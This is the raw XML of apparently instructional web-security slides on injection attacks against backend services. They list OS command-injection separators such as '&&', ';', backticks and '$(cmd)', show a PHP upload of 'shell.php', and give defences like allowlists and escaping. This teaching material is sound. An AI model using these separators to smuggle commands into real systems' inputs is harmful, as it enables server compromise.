              <a:t>https://xkcd.com/327/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8ADB578-D42B-4AE9-B36E-D123AE8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157288"/>
            <a:ext cx="60579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5A050C-3E21-4D98-A6FB-F7BD2052D8A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224867" y="6098957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https://9gag.com/gag/aBg8PLx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1498306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30EA98EE-412C-46E2-88B7-B7FCA3ADF276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996793" y="1077384"/>
            <a:ext cx="10198413" cy="2432997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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>included</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> (backend) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>messes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>up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predefined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>structure</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="6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5324ED-6FA8-414B-8D1A-0CE5F9618E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1551718" y="4389319"/>
            <a:ext cx="9088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you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think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of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any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other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context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we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can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mess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(xxx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="32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2A90FFD-AEB3-4A81-BE76-CA633870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1" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979309" y="651231"/>
            <a:ext cx="6467475" cy="2040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DFCC7ED-EDDF-4A54-8C95-2BAD39969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CEF7E55-8719-40D6-B1F5-DAB2AD5EAB51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237867" y="5361653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142B4-C17D-41DF-9098-F9EB368F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AD255C-90D1-4E50-88CB-991F1E15B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694" y="5993004"/>
            <a:ext cx="2105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4319747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39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5124D27-1669-4773-81F3-BB18EFE96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60"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2847975" y="387897"/>
            <a:ext cx="6496050" cy="204360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AA496DF-B173-42F3-9415-E93922FEB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D67CC2-CA5E-497C-87F1-BB0F3B4237DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574616" y="5149575"/>
            <a:ext cx="97225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818F2-CFED-494B-AAF0-473AA850C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454" y="5862459"/>
            <a:ext cx="8317091" cy="50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713550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2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574943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088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601336"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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277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D70FC0-8B43-4971-BA8E-417BEE0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backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>injections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99E414-BAA2-463C-AC0F-89D3DCD5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5114" cy="4858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/>
              <a:t>SMTP/Email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https://www.acunetix.com/blog/articles/email-header-injection/ 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LDAP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https://www.netsparker.com/blog/web-security/ldap-injection-how-to-prevent/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html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XML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DE" dirty="0"/>
              <a:t>http://projects.webappsec.org/w/page/13247004/XML%20Injection#:~:text=XML%20Injection%20is%20an%20attack,intend%20logic%20of%20the%20application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.whitehatsec.com/glossary/content/xml-injection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NoSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.netsparker.com/blog/web-security/what-is-nosql-injection/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.acunetix.com/blog/web-security-zone/nosql-injections/ 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5150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655C2CFD-5BA0-4F5C-AA14-E695FDB45076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996793" y="1077385"/>
            <a:ext cx="10198413" cy="209674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all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="66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AB982346-B876-4728-8AAF-1CEF2DE7FD56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128172" y="3683876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also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>attack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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>directly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416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170E234-74AC-4F22-A74B-0505CE224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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898103" y="493985"/>
            <a:ext cx="8248650" cy="28225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C690FC0-913E-4288-9C7E-A0633D65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73A6F5-F6BD-4D15-9866-8F3A51B13325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3152780" y="5152764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8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2B166-3DDB-431B-8123-D7E34D85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 err="1"/>
              <a:t>Characters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separation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7F541-BAE6-4467-B109-9D33DF86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Windows and Linux/Unix:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  &amp;   &amp;&amp;   |   ||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/>
              <a:t>Linux/Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  ;   \n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>command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`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>cmd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B76ED-A2F8-4177-8D49-4B3E81A68DF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293257" y="6308209"/>
            <a:ext cx="7808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https://portswigger.net/web-security/os-command-injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3704459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613764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9101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1120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2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0F6E9-23ED-49C4-9FF3-FF498794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93375-D79C-4050-8256-B9B1E639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Just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OS-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code!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safer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APIs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Just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>don‘t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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>STRICT Input Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Explicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Allowlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Typecasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Separation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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>subprocess.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>() in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>python</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>escaping</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>escapeshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>() in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67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0836581"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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12071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328500"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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9948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think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another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> code on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>server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1213134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4EFE98-B5B3-4C4F-AC1D-43D6FBC6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42" y="817999"/>
            <a:ext cx="10178916" cy="49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0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4395E09-CE5A-4903-93AF-246C12A0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433387"/>
            <a:ext cx="104203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457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A067256-774F-4A84-8375-3FB984FB4B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798787" y="74001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Array (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>   [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>pic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; Array (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [type] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>octet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>-stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>phpXBWCgN</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; 107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>   )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/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8FE9FE-9398-433B-8C02-0B116ECD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63" y="3532663"/>
            <a:ext cx="7686837" cy="862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1C6B943-318E-4568-B530-8F7636C84DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452707" y="1813174"/>
            <a:ext cx="57392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it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all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comes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from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client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–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trustworthy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102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94331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3693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600681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88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D7FDDA-EDE1-4AE7-BFCC-AFCF5BA7D893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/>
              <a:t>That</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>‘s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>pretty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> nice,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but </a:t>
            </a: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retrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>data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83647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12361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03672-24FB-44A3-B5D9-4C1450E7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request routing ???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51A4-CFAC-492A-A2CD-11B29D9F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79924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Classic routing:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>http://example.com/showprofile.php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Explicit routing: http://example.com/showprofile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2300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e.g. Laravel (PHP): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Route::get('/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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>UserController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>::class, '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’]);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https://laravel.com/docs/8.x/routing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e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: Django (Python): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>urlpatterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> = [ path('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>showprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>views.userprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>)]</a:t>
            </a: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	https://docs.djangoproject.com/en/3.1/topics/http/urls/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DF819DD0-E742-4E67-9762-50F655D2D9B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="10179262" y="1865588"/>
            <a:ext cx="189188" cy="851339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst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  <a:gd name="connsiteX7" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY7" fmla="*/ 434183 h 851339"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 851339"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 851339"/>
              <a:gd name="connsiteX1" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY1" fmla="*/ 15765 h 851339"/>
              <a:gd name="connsiteX2" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY2" fmla="*/ 400225 h 851339"/>
              <a:gd name="connsiteX3" fmla="*/ 189188 w 189188"/>
              <a:gd name="connsiteY3" fmla="*/ 415990 h 851339"/>
              <a:gd name="connsiteX4" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY4" fmla="*/ 431755 h 851339"/>
              <a:gd name="connsiteX5" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY5" fmla="*/ 835574 h 851339"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY6" fmla="*/ 851339 h 8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188" h="851339" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52019" y="-298"/>
                  <a:pt x="93537" y="4752"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118501" y="165787"/>
                  <a:pt x="77150" y="269671"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96886" y="410851"/>
                  <a:pt x="127031" y="416827"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="134887" y="415456"/>
                  <a:pt x="94631" y="420905"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="97835" y="589540"/>
                  <a:pt x="70994" y="704786"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101035" y="843755"/>
                  <a:pt x="53782" y="849544"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-5401" y="665610"/>
                  <a:pt x="6591" y="631027"/>
                  <a:pt x="0" y="434183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-6591" y="237339"/>
                  <a:pt x="48781" y="119132"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="189188" h="851339" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52039" y="-200"/>
                  <a:pt x="92952" y="7208"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95964" y="127570"/>
                  <a:pt x="63852" y="274985"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103904" y="403414"/>
                  <a:pt x="142198" y="418763"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138087" y="415228"/>
                  <a:pt x="95851" y="423471"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123945" y="572589"/>
                  <a:pt x="57758" y="636080"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102672" y="837887"/>
                  <a:pt x="52667" y="849917"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
              </a:path>
              <a:path w="189188" h="851339" fill="none" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52626" y="-204"/>
                  <a:pt x="94434" y="7425"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101263" y="181974"/>
                  <a:pt x="91762" y="255672"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88783" y="407848"/>
